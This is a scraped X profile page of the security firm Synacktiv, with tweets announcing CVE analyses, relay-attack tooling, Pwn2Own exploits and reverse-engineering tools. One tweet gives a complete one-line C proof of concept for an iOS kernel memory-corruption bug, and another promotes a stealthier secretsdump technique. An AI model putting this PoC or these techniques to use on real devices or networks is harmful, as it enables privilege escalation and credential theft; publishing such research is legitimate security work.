Synacktiv (@Synacktiv) / X

Synacktiv

1,805 posts

Synacktiv

@Synacktiv

Offensive security company. Dojo of many ninjas. Red teaming, reverse engineering, vuln research, dev of security tools and incident response.

France

Joined April 2012

Synacktiv
@Synacktiv
Mar 16, 2022
The PoC is even tweetable ;) void *C(void* a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,*(int *)a,2,6);__builtin_trap();return a;} int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}
John Aakerblom
@jaakerblom
Mar 16, 2022
iOS 15.4 fixes a kernel vulnerability introduced in iOS 15.0 beta that causes corruption of ipc_kmsgs leading to powerful primitives that can be used for local privilege escalation from WebContent and app sandbox
Synacktiv
@Synacktiv
Dec 12, 2024
You can now relay any protocol to SMB over Kerberos with krbrelayx.py and the latest PRs from @hugow_vincent. Thanks @_dirkjan for merging it! Here is an example from SMB to SMB:
46K
Synacktiv
@Synacktiv
Jun 11, 2025
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d. synacktiv.com/publications/n…
210K
Synacktiv
@Synacktiv
Dec 18, 2023
To facilitate reverse-engineering of large programs, vulnerability research and root-cause analysis on iOS, Android, and other major platforms, @myr463 and @Hexabeast released Frinet, a tool combining Frida with an enhanced version of Tenet.
Frinet: reverse-engineering made easier
From synacktiv.com
34K
Synacktiv
@Synacktiv
May 7, 2021
Lazy to write payloads in @Burp_Suite? HopLa adds autocompletion support and a custom payload library! 🤠 github.com/synacktiv/HopLa cc @alexisdanizan
GIF
Synacktiv
@Synacktiv
Feb 20, 2025
In our latest article, @l4x4 revisits the secretsdump implementation, offering an alternative avoiding reg save and eliminates writing files to disk, significantly reducing the likelihood of triggering security alerts. Read the details at synacktiv.com/publications/l….
LSA Secrets: revisiting secretsdump
From synacktiv.com
42K
Synacktiv
@Synacktiv
Sep 24, 2020
This is for the Pwners: exploiting a WebKit 0-day in PlayStation 4! We are happy to announce that @0xdagger and @abu_y0ussef will present their work on breaking the PS4 at #BHEU @BlackHatEvents ! blackhat.com/eu-20/briefing…
GIF
Synacktiv
@Synacktiv
May 20, 2022
If you see two guys wearing Synacktiv t-shirts with big antennas, you should turn around with your @Tesla! 0-click RCE demonstration on a real vehicle, with CAN messages sent to switch on headlights, wipers and trunk 😎 #Pwn2Own
00:00
Synacktiv
@Synacktiv
Jan 2, 2025
You can now use LDAP/LDAPs protocols with the SOCKS proxy of ntlmrelayx thanks to the PR from @b1two_ (now merged upstream). Here is an example with ldeep using relayed authentication from HTTP to LDAPs :
66K
Synacktiv
@Synacktiv
Mar 12, 2020
Since MSRC just published a fix for CVE-2020-0796, here's @_lucas_georges_ quick and dirty root cause analysis on it: synacktiv.com/posts/exploit/… #sambadijaneiro
I'm SMBGhost, daba dee daba da
From synacktiv.com
Synacktiv
@Synacktiv
Dec 1, 2020
As no details are available yet, our expert @0xf4b started investigating one of the three iOS vulnerabilities that are exploited in the wild and fixed by version 14.2. You can read the story in our latest blogpost! synacktiv.com/publications/i…
Synacktiv
@Synacktiv
Feb 2, 2021
We are in 2021 and SFTP access will never grant you a PTY. But you may still be able to use it to forward data to local ports, remote ports and to Unix domain sockets. A Remote Code Execution is then never far away! #synacktips
Synacktiv
@Synacktiv
Mar 10, 2023
Ninjas are getting ready for #P2OVancouver 💪 #Pwn2Own
45K
Synacktiv
@Synacktiv
Jan 18, 2023
Watchout! CVE-2023-22809 on Sudo was patched today to prevent a privilege escalation on sudoedit. Read the security advisory by @aevy__ and @v1csec: synacktiv.com/sites/default/…
50K